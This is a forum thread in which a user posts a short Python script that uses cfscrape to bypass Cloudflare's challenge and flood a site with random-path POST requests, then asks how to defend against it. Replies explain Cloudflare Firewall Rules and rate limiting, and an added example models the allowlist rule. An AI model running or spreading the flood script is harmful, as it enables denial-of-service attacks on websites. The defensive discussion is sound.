CloudFlare Bypassed?

I took some time and wrote a very simple script that can take down a website using Cloudflare. I see this as something Cloudflare should work on for free users, since nobody has money to spend on rate limiting or Cloudflare Pro.

# pip install cfscrape
# Python2
import cfscrape
import random
s = cfscrape.create_scraper()
while 1:
    x = str(random.random())
    print s.post('http://example.com/'+x).headers

It spams post requests or any requests really to a random URI on the target website, flooding the web server. As a DoS, it cannot harm the web server, but with multiple devices, I’ve noticed web server timeouts.
Could someone please reply and inform me what could be done to stop this without the usage of rate limiting?

Cloudflare does allow 10k free rate limiting actions

The power of Firewall Rules is available on all plans.

You can, for instance, Challenge (reCaptcha) any visitor not coming after the main URLs of your front end.

You can easily do this if your site is small and doesn’t have many URLs.

For larger sites, I’d first visit Google Analytics, to run a report to see which of the site URLs are the most visited in a given period, say a year or 6 mos.

Once you have the list of URLs, you create a Firewall Rule that will look like this:

(not cf.client.bot and http.host eq "example.com" and not http.request.uri.path in {"/url-1/" "/url-2/" "/url-3/" ... "/url-n/"})
then... 
Challenge

That in essence would make Cloudflare servers respond to what would (mostly) be 404s by stopping the bots at the edge. It would also challenge legit visitors coming after less visited URLs, so you should set the time for bypassing the Challenge after one is successfully passed accordingly.

I have one such rule for each of my sites in stand-by mode, to be enabled only if needed.

Likewise, you can create a similar rule for random query strings, but that would require a bit of digging into the site’s specifics, to avoid challenging legit behavior that depends on QS, such as purchases and in-site searching.

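To see what the Firewall Rule in the reply above actually does to the kind of traffic described in the first post, here is an added example (not from this thread and not Cloudflare's rule engine): a small Python model of the rule, plus the optional query-string variant the reply mentions. The allowlisted paths, the allowed query-string keys and the sample URLs are all constructed for the example.

```python
# Added example: a simplified evaluator for the rule
#   (not cf.client.bot and http.host eq "example.com"
#    and not http.request.uri.path in {"/url-1/" "/url-2/" ...})  then Challenge
# It only models the operators that rule uses, not Cloudflare's real engine.
from urllib.parse import urlsplit, parse_qs

# Constructed: the "most visited" URL allowlist the reply says to build from analytics.
ALLOWED_PATHS = {"/", "/url-1/", "/url-2/", "/url-3/"}
# Constructed: query-string keys the site legitimately uses (search, purchases, paging).
ALLOWED_QS_KEYS = {"s", "product_id", "page"}
SITE_HOST = "example.com"


def firewall_action(url, verified_bot=False, qs_rule=False):
    """Return 'challenge' or 'allow' for one request URL.

    verified_bot stands in for cf.client.bot; qs_rule=True also applies the
    optional rule for unexpected query-string keys described in the reply.
    """
    parts = urlsplit(url)
    # The rule only matches non-verified bots hitting this host; anything else passes.
    if verified_bot or parts.hostname != SITE_HOST:
        return "allow"
    # http.request.uri.path excludes the query string, so compare the path alone.
    if parts.path not in ALLOWED_PATHS:
        return "challenge"  # e.g. the random /0.7316... paths the flood script generates
    if qs_rule and parts.query:
        keys = set(parse_qs(parts.query, keep_blank_values=True))
        if not keys <= ALLOWED_QS_KEYS:
            return "challenge"  # query keys the site never uses
    return "allow"


def summarize(urls, **kwargs):
    """Count actions over a batch of request URLs (constructed sample traffic)."""
    counts = {"allow": 0, "challenge": 0}
    for url in urls:
        counts[firewall_action(url, **kwargs)] += 1
    return counts
```

Running `summarize` over a mix of real page URLs and random-path requests shows the flood getting challenged at the edge while allowlisted pages still pass; legit visitors to less-visited pages are the ones who see the challenge, which is the trade-off the reply points out.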